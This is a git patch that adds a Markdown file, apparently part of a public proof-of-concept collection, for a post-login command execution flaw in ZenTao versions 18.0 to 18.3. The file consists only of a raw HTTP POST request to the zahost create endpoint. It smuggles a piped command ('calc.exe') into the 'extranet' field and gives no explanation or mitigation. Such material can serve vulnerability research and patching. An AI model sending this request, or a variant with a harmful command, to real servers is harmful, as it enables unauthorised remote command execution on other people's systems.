From 30839e09669d8f69cd85e44de3fdeb2eaad98b30 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 20 Aug 2023 09:23:50 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=A6=85=E9=81=93=20v18.0-v18.3=20?= =?UTF-8?q?=E5=AD=98=E5=9C=A8=E5=90=8E=E5=8F=B0=E5=91=BD=E4=BB=A4=E6=89=A7?= =?UTF-8?q?=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 禅道 v18.0-v18.3 存在后台命令执行漏洞.md | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 禅道 v18.0-v18.3 存在后台命令执行漏洞.md diff --git a/禅道 v18.0-v18.3 存在后台命令执行漏洞.md b/禅道 v18.0-v18.3 存在后台命令执行漏洞.md new file mode 100644 index 0000000..c7c02f3 --- /dev/null +++ b/禅道 v18.0-v18.3 存在后台命令执行漏洞.md @@ -0,0 +1,23 @@ +## 禅道 v18.0-v18.3 存在后台命令执行漏洞 +``` + +POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:109.0)Gecko/20100101 Firefox/111.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Referer: http://xxx.xxx.xxx.xxx/zentaopms/www/index.php?m=zahost&f=create +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 134 +Origin: http://xxx.xxx.xxx.xxx +Connection: close +Cookie: zentaosid=fwaf16g51w678678qw686; +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +vsoft=kvm&hostType=physical&name=penson&extranet=xxx.xxx.xxx.xxx%7Ccalc.exe&cpuCores= +2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=z +```